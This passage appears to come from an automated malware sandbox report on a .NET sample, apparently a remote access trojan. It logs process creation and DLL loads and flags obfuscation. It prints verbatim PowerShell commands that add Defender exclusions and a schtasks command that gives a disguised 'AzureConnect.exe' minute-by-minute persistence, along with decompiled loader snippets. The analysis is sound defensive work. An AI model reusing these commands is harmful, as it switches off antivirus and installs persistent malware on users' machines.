            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
            Source: unknownProcess created: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: mscoree.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: apphelp.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: kernel.appcore.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: version.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: uxtheme.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: sspicli.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: cryptsp.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: rsaenh.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: cryptbase.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: mscoree.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: kernel.appcore.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: version.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: uxtheme.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: sspicli.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: cryptsp.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: rsaenh.dll
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: file.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: file.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: file.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: file.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: file.exe, Messages.cs.Net Code: Memory
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: AzureConnect.exe.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E1D2A5 pushad ; iretd 2_2_00007FF848E1D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF849002316 push 8B485F92h; iretd 2_2_00007FF84900231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848DFD2A5 pushad ; iretd 5_2_00007FF848DFD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848FE2316 push 8B485F94h; iretd 5_2_00007FF848FE231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848FE9BAA push D000009Bh; iretd 5_2_00007FF848FE9BC1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E2D2A5 pushad ; iretd 8_2_00007FF848E2D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF849012316 push 8B485F91h; iretd 8_2_00007FF84901231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848DED2A5 pushad ; iretd 10_2_00007FF848DED2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F019DB pushad ; ret 10_2_00007FF848F019E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F01075 push E95BD705h; ret 10_2_00007FF848F01239
